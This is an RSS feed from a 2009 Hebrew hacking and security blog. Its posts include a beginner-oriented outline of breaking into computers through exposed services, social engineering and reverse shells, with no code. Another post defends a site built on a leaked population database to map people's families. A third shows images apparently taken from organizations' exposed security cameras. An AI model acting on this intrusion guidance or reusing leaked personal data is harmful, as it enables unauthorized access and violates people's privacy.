<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1108&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1108/feed</wfw:commentRss>
		<slash:comments>22</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1108?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫איך דה מרקר תומכים בחוק הביומטרי?‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/4-qpdV9JdQA/1106</link>
		<comments>http://www.hacking.org.il/1106#comments</comments>
		<pubDate>Wed, 15 Jul 2009 23:14:10 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1106</guid>
		<description><![CDATA[&#8235;אם לא קראתם עדיין בדה-מרקר, איזשהו האקר ישראלי הקים אתר החושף את פרטיכם האישיים.
האתר המעניין ישב בכתובת http://infoplus.hacking.org.il (אל תנסו, הוא כבר לא למעלה).
כיוון שאור הירשאוגה ובר בן ארי לא עשו את עבודתם העיתונאית בצורה מקצועית (לא פנו אלי כדי לברר עובדות), אני חייב להגיב פה ולא שם.
1. שני חברים שלי (השם שמור במערכת, אם [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1106&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>אם לא קראתם עדיין בדה-מרקר, איזשהו <a href="http://it.themarker.com/tmit/article/7359" target="_blank">האקר ישראלי הקים אתר החושף את פרטיכם האישיים</a>.</p>
<p>האתר המעניין ישב בכתובת http://infoplus.hacking.org.il (אל תנסו, הוא כבר לא למעלה).</p>
<p>כיוון ש<span>אור הירשאוגה ובר בן ארי לא עשו את עבודתם העיתונאית בצורה מקצועית (לא פנו אלי כדי לברר עובדות), אני חייב להגיב פה ולא שם.</span></p>
<p><span>1. שני חברים שלי (השם שמור במערכת, אם הם ירצו הם יגיבו) ואני הרגשנו שיש בעיה עם החוק הביומטרי.</span></p>
<p><span>כאדם שמכיר לא רע את תחום אבטחת המידע אני סמוך ובטוח שיש אפשרות סבירה מאוד שהמאגר כולו ידלוף החוצה (קרה מספר פעמים בעבר עם מאגרים אחרים) וגם אם לא, אני לא סומך על הפיקוח האמיתי של הנגישות אליו מצד שלטונות החוק.</span></p>
<p><span>לפני מספר ימים חשבנו לעורר קצת רעש עיתונאי שמסביר כמה מסוכן מאגר כזה ולצורך כך הוקם ביום שבת (עד ראשון או שני) אתר בסיסי שבעצם מורכב מבסיס הנתונים של אגרון שאותו מצאנו ככל אדם אחר באימיול.</span></p>
<p><span>הרעיון היה שבהנתן מספר תעודת זהות כלשהיא, ייוצר עבורו עץ משפחה מפורט כולל נ&quot;צ שמראים על המפה איפה ממוקמת משפחתו.</span></p>
<p><span>2. האתר אוחסן ב-subdomain שלי ולא פורסם.</span></p>
<p><span>הכוונה היתה לפנות אל כמה גורמים עיתונאים (בינהם גם אחד מהעיתונאים המוזכרים למעלה) ולהראות להם כמה מסוכן מאגר מידע כזה.</span></p>
<p><span>3. חבר שלי פנה אל אתר no2bio, (לא מגיע להם קישור) וסיפר להם על היוזמה. בתמורה לכך </span><span>הטיפשים </span><span>חשפו את האתר שעוד לא היה נעול כהלכה. עוד לא היה מוגן בסיסמה וכ&quot;ו.</span></p>
<p><span>מאז התגלגל סוג של כדור שלג שאני לא ממש יכול לעצור אותו.</span></p>
<p><span>מאכזב מאוד לראות שאותם כתבים לא לקחו את הכתבה למקום הנכון אלא בחרו לעסוק בדברים אחרים. זכותם.</span></p>
<p><span>אור </span><span>הירשאוגה </span><span>- אני יודע שאתה קורא של הבלוג הזה. איפה היושר המקצועי שלך? לא שווה לתפוס אותי כדי להבין מה עומד מאחורי זה? אתה הרי יודע של מי הדומיין.</span></p>
<p><span>לעזאזל- אפילו ראיתי שנרשמת לעידכונים שלי ב-tweeter (שלא קורה בהם הרבה).<br />
</span></p>
<p><span>אני לחלוטין מאוכזב מהצורה שבה התנהלו הדברים. זה לא מה שהייתי מצפה מכתבים רציניים.</span></p>
<p>לדעתי הרעש הזה שנוצר אמנם מראה למה לא צריך להיות מאגר כזה אבל לא זאת הצורה.</p>
<p>דה-מרקר הצליח להרוס יוזמה להבהרה למה החוק לא טוב ולכן אני רואה את זה כתמיכה בחוק. כל הכבוד.</p>
<p><span>אגב, יש כאן ציטוט:</span></p>
<p><span> </span>&quot;הקמתי את האתר כחלק מקמפיין נגד המאגר הביומטרי&quot;, סיפר ל-TheMarker IT מקים האתר. &quot;למעשה, אין פה שימוש במידע חדש &#8211; לא נכנסתי למאגרים הנוכחיים. המטרה של האתר היא להדגים לאנשים כיצד ניתן לעשות בקלות שימוש בנתונים המוחזקים במאגרים הממשלתיים&quot;.</p>
<p>אני לא יודע את מי הם ראיינו (אולי אחד משני חברי). אלי הם לא פנו בכל מקרה.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1106&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1106/feed</wfw:commentRss>
		<slash:comments>52</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1106?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫איך פורצים למחשב (הפוסט הזה לא מיועד למקצוענים).‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/uD2tW75QeeU/1104</link>
		<comments>http://www.hacking.org.il/1104#comments</comments>
		<pubDate>Mon, 13 Jul 2009 01:24:45 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[האקינג]]></category>
		<category><![CDATA[כובע שחור]]></category>
		<category><![CDATA[פריצה למחשב]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1104</guid>
		<description><![CDATA[&#8235;טוב, אני מזהיר מראש שהפוסט הזה נועד לחבר'ה הצעירים בפורומים.
מה שקורה הוא שהם מתחילים ללמוד קצת Web Application Hacking ואחרי שהם מצליחים לעשות קצת Sql Injections הם מרגישים ששום דבר לא יכול לעצור אותם.
כיוון שהזרקות SQL הם דבר טכני שיחסית קל ללמוד אותו, בד&#34;כ הם מהר מאוד מתחילים להתעניין איך פורצים למחשב.
אבל אין הרבה דברים [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1104&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>טוב, אני מזהיר מראש שהפוסט הזה נועד לחבר'ה הצעירים בפורומים.</p>
<p>מה שקורה הוא שהם מתחילים ללמוד קצת Web Application Hacking ואחרי שהם מצליחים לעשות קצת <a href="http://www.hacking.org.il/?p=414" target="_blank">Sql Injections</a> הם מרגישים ששום דבר לא יכול לעצור אותם.</p>
<p>כיוון ש<a href="http://www.hacking.org.il/?p=414" target="_blank">הזרקות SQL</a> הם דבר טכני שיחסית קל ללמוד אותו, בד&quot;כ הם מהר מאוד מתחילים להתעניין איך פורצים למחשב.</p>
<p>אבל אין הרבה דברים דומים בין לתקוף שרת אינטרנט למחשב רגיל.<br />
בעוד שרת אינטרנט מראש נותן לך גישה מסויימת אליו (בד&quot;כ קריאת קבצים, לעיתים גם יותר מזה) מחשב רגיל לא חושף בד&quot;כ שירותים אל הרשת ובטח לא אל האינטרנט.</p>
<p>מערכות הפעלה מסויימות חושפות (תלוי בהגדרות) שירותים בסיסיים (שיתוף מדפסות ואולי אפילו שיתוף קבצים).<br />
כדי לפרוץ למחשב אתה צריך לבדוק אם הוא נותן שירותי רשת כלשהם. אם כן &#8211; לבדוק מה השירות והאם אפשר לנצל אותו לצורך הרצת קוד.<br />
במידה ואי אפשר &#8211; תצטרך למצוא פרצת REMOTE במערכת ההפעלה. אבל זה באמת דבר שלא כל אחד יכול ומוכשר לחפש ולמצוא כאלה ועוד פחות מוכשרים גם לדעת לנצל כאלה.</p>
<p>אז איך בכל זאת אפשר לפרוץ למחשב?</p>
<p>הנדסה חברתית היא פתרון לא רע.</p>
<p>אם נוכל לגרום למשתמש לעשות משהו שיאפשר לנו להריץ עליו קוד &#8211; ניצחנו.<br />
זה יכול להיות באמצעות מייל זדוני, הודעת מסנג'ר, קובץ שנשלח ועוד כל דבר העולה במוח ההזוי שלנו.</p>
<p>אם הצלחנו להריץ קוד &#8211; פשוט יחסית לייצר Revers Shell אלינו ובעצם ניצחנו &#8211; פרצנו לו למחשב.</p>
<p>עכשיו רציתי לכתוב הסבר על מה זה Reverse Shell אבל ממש במקרה לפני כמה ימים דיברתי עם נחום הספאמר והוא שלח לי לינק עתיק לבלוג של עמרי שמסביר מה זה <a href="http://firefang.net/blog/278" target="_blank">Reverse Shell</a>.</p>
<p>תמסרו לו ד&quot;ש כשאתם הולכים לקרוא <img src='http://www.hacking.org.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1104&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1104/feed</wfw:commentRss>
		<slash:comments>41</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1104?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫איך לאבטח את ממשק הניהול של WORDPRESS?‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/HFaL5uuoZHA/1096</link>
		<comments>http://www.hacking.org.il/1096#comments</comments>
		<pubDate>Fri, 03 Jul 2009 11:58:46 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[אבטחת מידע]]></category>
		<category><![CDATA[וורדפרס]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1096</guid>
		<description><![CDATA[&#8235;WORDPRESS שוהה לו בתוך שרת ה-WEB הפופלרי apache.
אחד הדברים הקלים ביותר לעשות ב-apache הוא להגביל גישה לתיקיות מסויימות.
תיקייה שהגיוני מאוד להגביל את הגישה אליה היא תיקיית wp-admin ב-WORDPRESS.
אם אינכם רוצים לאפשר רישום משתמשים לבלוג שלכם ואתם רוצים להעלות את רמת האבטחה בבלוג ולהוריד את סיכויי הפריצה אליו &#8211; הפוסט הזה בשבילכם  
אז איך עושים [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1096&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>WORDPRESS שוהה לו בתוך שרת ה-WEB הפופלרי apache.</p>
<p>אחד הדברים הקלים ביותר לעשות ב-apache הוא להגביל גישה לתיקיות מסויימות.</p>
<p>תיקייה שהגיוני מאוד להגביל את הגישה אליה היא תיקיית wp-admin ב-WORDPRESS.</p>
<p>אם אינכם רוצים לאפשר רישום משתמשים לבלוג שלכם ואתם רוצים להעלות את רמת האבטחה בבלוג ולהוריד את סיכויי הפריצה אליו &#8211; הפוסט הזה בשבילכם <img src='http://www.hacking.org.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>אז איך עושים את זה?</p>
<p>מייצרים בתוך תיקיית wp-admin שנמצאת תחת התיקייה של הבלוג קובץ בשם htaccess.</p>
<p>שימו לב, השם מורכב מ-נקודה(.) ואז htaccess.</p>
<p>הקובץ צריך להיות בפורמט הבא:</p>
<p dir="ltr">AuthName &quot;Restricted Area&quot;<br />
AuthType Basic<br />
AuthUserFile /var/www/.htpasswd<br />
AuthGroupFile /dev/null<br />
require valid-user</p>
<p>שימו לב שיש כאן הגדרה של AuthUserFile.</p>
<p>זהו קובץ השמות והסיסמאות של מורשי הכניסה לתיקייה שהחלטתם להגן עליה.</p>
<p>הקובץ צריך להיות בתיקייה <strong>מחוץ</strong> לאתר כך שלא יוכלו לגשת אליו.</p>
<p>מבנה קובץ הסיסמאות יהיה כזה:</p>
<p dir="ltr">user:6F7qwerOBK03Z</p>
<p>כדי לייצר לעצמכם קובץ סיסמאות תוכלו להשתמש במחולל הזה:</p>
<p><a href="http://www.htaccesstools.com/htpasswd-generator/" target="_blank">http://www.htaccesstools.com/htpasswd-generator</a></p>
<p>אז זהו?</p>
<p>כמעט.</p>
<p>אם תבדקו כרגע תראו שהתיקייה מוגנת בשם ובסיסמה שקבעתם לעצמכם.</p>
<p>הבעיה היא שיכול להיות שיש קובץ CSS שנמצא בתוך התיקייה הזאת (אצלי היה קובץ כזה).</p>
<p>נסו להכנס אל הבלוג בלי שהייתם מחוברים לתיקיית הניהול.</p>
<p>אם קופץ לכם חלון הדורש זיהוי, גם אצלכם יש את התופעה של ה-CSS הסורר שמוגן כרגע בסיסמה.</p>
<p>מה עושים?</p>
<p>עורכים שוב את .htaccess שלנו ומוסיפים את השורות הבאות:</p>
<p dir="ltr">&lt;Files css/install-rtl.css&gt;<br />
order allow,deny<br />
allow from all<br />
&lt;/Files&gt;</p>
<p>זו הדוגמה של ה-CSS שהיה אצלי.</p>
<p>במידה ויש קפיצה של בקשת סיסמה על דפים אחרים &#8211; בצעו את זה גם עליהם.</p>
<p>זהו, הבלוג שלכם הרבה יותר בטוח..</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1096&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1096/feed</wfw:commentRss>
		<slash:comments>10</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1096?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫מה יותר גדול? K או M?‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/oE8EhbRDFhU/1093</link>
		<comments>http://www.hacking.org.il/1093#comments</comments>
		<pubDate>Thu, 25 Jun 2009 20:58:54 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1093</guid>
		<description><![CDATA[&#8235;בעקבות הכתבה המדהימה הזו (http://www.ynet.co.il/articles/0,7340,L-3736935,00.html)..
אם קראתם ולא שמתם לב &#8211; הנה זה פה:
אז אתם מבינים? לקוחות HOT המסכנים שלהם יש אפשרות UPLOAD עלובה של 1M לא יוכלה להנות מהמצב כמו שיוכלו להנות ממנו לקוחות NGN שנהנים מ-800K.
פשוט מדהים..
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1093&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>בעקבות הכתבה המדהימה הזו (<a href="http://www.ynet.co.il/articles/0,7340,L-3736935,00.html" target="_blank">http://www.ynet.co.il/articles/0,7340,L-3736935,00.html</a>)..</p>
<p>אם קראתם ולא שמתם לב &#8211; הנה זה פה:</p>
<p><img class="aligncenter size-full wp-image-1094" title="UPLOAD" src="http://www.hacking.org.il/wp-content/uploads/2009/06/1.jpg" alt="UPLOAD" width="629" height="117" />אז אתם מבינים? לקוחות HOT המסכנים שלהם יש אפשרות UPLOAD עלובה של 1M לא יוכלה להנות מהמצב כמו שיוכלו להנות ממנו לקוחות NGN שנהנים מ-800K.</p>
<p>פשוט מדהים..</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1093&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1093/feed</wfw:commentRss>
		<slash:comments>18</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1093?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫OS3 לאייפון‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/SeOL1gxIRC0/1090</link>
		<comments>http://www.hacking.org.il/1090#comments</comments>
		<pubDate>Wed, 24 Jun 2009 01:38:58 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1090</guid>
		<description><![CDATA[&#8235;התקנתי את מערכת ההפעלה 3 לאייפון.
ההתקנה עבדה חלק בלי שום בעיות וגם לא איבדתי את הנתונים עליו.
אחרי ההתקנה:
המכשיר עובד חלק, בלי שום בעיות.
לקח לי זמן להזכר בהגדרות של האינטרנט לפלאפון אבל מצאתי אותן בסוף.
Jail Break לקח כמה דקות.
חוץ מזה המכשיר פשוט מעולה ומערכת ההפעלה החדשה מדהימה  
cydia עובד נהדר ולא קורס לחלוטין (למרות שאומרים [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1090&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>התקנתי את מערכת ההפעלה 3 לאייפון.</p>
<p>ההתקנה עבדה חלק בלי שום בעיות וגם לא איבדתי את הנתונים עליו.</p>
<p>אחרי ההתקנה:</p>
<p>המכשיר עובד חלק, בלי שום בעיות.</p>
<p>לקח לי זמן להזכר בהגדרות של האינטרנט לפלאפון אבל מצאתי אותן בסוף.</p>
<p>Jail Break לקח כמה דקות.</p>
<p>חוץ מזה המכשיר פשוט מעולה ומערכת ההפעלה החדשה מדהימה <img src='http://www.hacking.org.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>cydia עובד נהדר ולא קורס לחלוטין (למרות שאומרים שהיו בעיות איתו בהתחלה, אני לא הרגשתי).</p>
<p>החיפוש במערכת החדשה פשוט משנה את החיים. כיף אמיתי.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1090&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1090/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1090?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫מצלמות אבטחה – לראות או לא לראות?!‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/gR24jMn6P1c/1073</link>
		<comments>http://www.hacking.org.il/1073#comments</comments>
		<pubDate>Mon, 15 Jun 2009 21:38:28 +0000</pubDate>
		<dc:creator>‫The-Insider‬</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1073</guid>
		<description><![CDATA[&#8235;


איך אפשר לסרב לגיא?!


תמונה שווה אלף מילים -&#62; 6 תמונות שוות 6000 -&#62; זה המון מילים!


העלתי תמונות רק תמונות שלא מאפשרות לזהות באופן ברור את הארגון כדי לא לעשות נזק לאף אחד


ראוי לציין שעשינו את על הכל בכדי להגן על פרטיותם של לקוחותינו


כבר לפני 3 חודשים פניניו לספקים ולגורמים נוספים בכדי לקדם את תהליך העדכון אצל [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=The-Insider&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1073&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><div class="mceTemp mceIEcenter">
<ol>
<li>
<div class="mceTemp mceIEcenter" style="TEXT-ALIGN: right"><strong><span style="color: #ffffff;">איך אפשר לסרב לגיא?!</span></strong></div>
</li>
<li>
<div class="mceTemp mceIEcenter" style="TEXT-ALIGN: right"><strong><span style="color: #ffffff;">תמונה שווה אלף מילים -&gt; 6 תמונות שוות 6000 -&gt; זה המון מילים!</span></strong></div>
</li>
<li>
<div class="mceTemp mceIEcenter" style="TEXT-ALIGN: right"><strong><span style="color: #ffffff;">העלתי תמונות רק תמונות שלא מאפשרות לזהות באופן ברור את הארגון כדי לא לעשות נזק לאף אחד</span></strong></div>
</li>
<li>
<div class="mceTemp mceIEcenter" style="TEXT-ALIGN: right"><strong><span style="color: #ffffff;">ראוי לציין שעשינו את על הכל בכדי להגן על פרטיותם של לקוחותינו</span></strong></div>
</li>
<li>
<div class="mceTemp mceIEcenter" style="TEXT-ALIGN: right"><strong><span style="color: #ffffff;">כבר לפני 3 חודשים פניניו לספקים ולגורמים נוספים בכדי לקדם את תהליך העדכון אצל הארגונים הפגיעים.</span></strong></div>
</li>
</ol>
</div>
<p class="mceTemp mceIEcenter" style="TEXT-ALIGN: right"><span style="color: #ffffff;">אני רוצה לשפוך קצת אור על תפיסה מסויימת של חלק מהאנשים.<br />
רוב האנשים בעולם חושבים שהאינטרנט זה: &quot;צא'ט&quot;, &quot;תוכנות מסרים&quot;, &quot;אתרים&quot;, &quot;מה שיש בגוגל&quot;<br />
במציאות, האינטרנט זה <strong>&quot;כל מכונה שיש לה IP&quot;</strong> בין אם יש לו גם דומיין או קישור מה WEB </span><span style="color: #ffffff;"><strong>וגם אם לא<br />
יתרה מכך, רוב האינטרנט נגיש אבל לא חשוף <img src='http://www.hacking.org.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
השלכה מסויימת של הקונספט (בנוסף לרכיבים כמו מצלמות) היא שתעבורה (חיבור, מידע, בקשות, תגובות) מול אתר שעובר דרך WAF כשניגשים לכתובת של האתר,</strong> </span><span style="color: #ffffff;"><strong><span style="text-decoration: underline;">לא בהכרח</span> עוברת דרך WAF<br />
(או מנגנון הגנה/סינון כלשהוא) כשניגשים לאחד השרתים הפנימיים (שאליהם מפנה Load Balancer)</strong> </span></p>
<div class="mceTemp mceIEcenter"><span style="color: #ffffff;"> </span></div>
<div class="wp-caption aligncenter" style="width: 354px"><a href="http://www.linkstofiles.com/images/11.jpg"><span style="color: #ffffff;"><img class="  " src="http://www.linkstofiles.com/images/11.jpg" alt="לילות לבנים במפעל" width="344" height="227" /></span></a><p class="wp-caption-text">לילות לבנים במפעל</p></div>
<dl>
<dt><a href="http://www.linkstofiles.com/images/9.jpg"><span style="color: #ffffff;"><img class=" " src="http://www.linkstofiles.com/images/9.jpg" alt="חנות בגדים - לא כולם קופצים על המציאה" width="390" height="310" /></span></a></dt>
<dd><span style="color: #ffffff;">חנות בגדים &#8211; לא כולם קופצים על המציאה</span></dd>
</dl>
<p><span style="color: #ffffff;"> </span></p>
<p><span style="color: #ffffff;"> </span></p>
<div class="wp-caption aligncenter" style="width: 324px"><a href="http://www.linkstofiles.com/images/6.jpg"><span style="color: #ffffff;"><img class="  " src="http://www.linkstofiles.com/images/6.jpg" alt="בית קפה" width="314" height="300" /></span></a><p class="wp-caption-text">בית קפה</p></div>
<p><span style="color: #ffffff;"> </span></p>
<div class="wp-caption aligncenter" style="width: 403px"><a href="http://www.linkstofiles.com/images/8.jpg"><span style="color: #ffffff;"><img class=" " src="http://www.linkstofiles.com/images/8.jpg" alt="קופה - עיניים על הכסף :)" width="393" height="311" /></span></a><p class="wp-caption-text">קופה - עיניים על הכסף <img src='http://www.hacking.org.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p></div>
<p><span style="color: #ffffff;"> </span></p>
<div class="wp-caption aligncenter" style="width: 402px"><a href="http://www.linkstofiles.com/images/10.jpg"><span style="color: #ffffff;"><img class=" " src="http://www.linkstofiles.com/images/10.jpg" alt="אז מה קונים?" width="392" height="309" /></span></a><p class="wp-caption-text">אז מה קונים?</p></div>
<p><span style="color: #ffffff;"> </span></p>
<div class="wp-caption aligncenter" style="width: 354px"><a href="http://www.linkstofiles.com/images/19.jpg"><span style="color: #ffffff;"><img class="  " src="http://www.linkstofiles.com/images/19.jpg" alt="הכספת - הפעם לא של ארז טל :)" width="344" height="226" /></span></a><p class="wp-caption-text">הכספת - הפעם לא של ארז טל <img src='http://www.hacking.org.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p></div>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=The-Insider&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1073&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1073/feed</wfw:commentRss>
		<slash:comments>17</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1073?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫מצלמות אבטחה? לא אם רפי מטפל בהן..‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/WQXptt_7w6U/1070</link>
		<comments>http://www.hacking.org.il/1070#comments</comments>
		<pubDate>Mon, 15 Jun 2009 08:38:42 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[אבטחת מידע]]></category>
		<category><![CDATA[האקינג]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1070</guid>
		<description><![CDATA[&#8235;אתם יכולים לקרוא על זה פה:
http://www.globes.co.il/news/article.aspx?QUID=1056,U1245000184502&#38;did=1000458312
אולי רפי יסכים לכתוב על זה גם כאן ולהרחיב? אני אשאל אותו..
אין ספק, הבחור תותח על  
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1070&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>אתם יכולים לקרוא על זה פה:</p>
<p><a href="http://www.globes.co.il/news/article.aspx?QUID=1056,U1245000184502&amp;did=1000458312" target="_blank">http://www.globes.co.il/news/article.aspx?QUID=1056,U1245000184502&amp;did=1000458312</a></p>
<p>אולי רפי יסכים לכתוב על זה גם כאן ולהרחיב? אני אשאל אותו..</p>
<p>אין ספק, הבחור תותח על <img src='http://www.hacking.org.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1070&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1070/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1070?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫כמה זה חכם לבקש מהאקרים לפרוץ אליך?‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/zQHk-0NB8ck/1067</link>
		<comments>http://www.hacking.org.il/1067#comments</comments>
		<pubDate>Fri, 12 Jun 2009 09:15:08 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[אבטחת מידע]]></category>
		<category><![CDATA[האקינג]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1067</guid>
		<description><![CDATA[&#8235;כל כמה חודשים אנחנו שומעים על דברים כאלה..
מה קורה כשבעל חברה מבקש שיפרצו את חשבון המייל שלו?
מישהו פורץ אליו.
3 חוקרי אבטחה (ובינהם אביב) נענו לאתגר הזה:
http://www.strongwebmail.com/secure/email/contests/hack
החברה באה להראות כמה צורת הזדהות כפולה (כגון שם+סיסמה ועוד משהו, במקרה שלהם שיחת טלפון) יכולה לשפר את האבטחה.
לצורך כך היא העמידה פרס של 10000$ לראשון שיצליח לפרוץ את חשבון [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1067&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>כל כמה חודשים אנחנו שומעים על דברים כאלה..</p>
<p>מה קורה כשבעל חברה מבקש שיפרצו את חשבון המייל שלו?<br />
מישהו פורץ אליו.<br />
3 חוקרי אבטחה (ובינהם <a href="http://raffon.net" target="_blank">אביב</a>) נענו לאתגר הזה:<br />
<a href="http://" target="_blank">http://www.strongwebmail.com/secure/email/contests/hack</a></p>
<p>החברה באה להראות כמה צורת הזדהות כפולה (כגון שם+סיסמה ועוד משהו, במקרה שלהם שיחת טלפון) יכולה לשפר את האבטחה.<br />
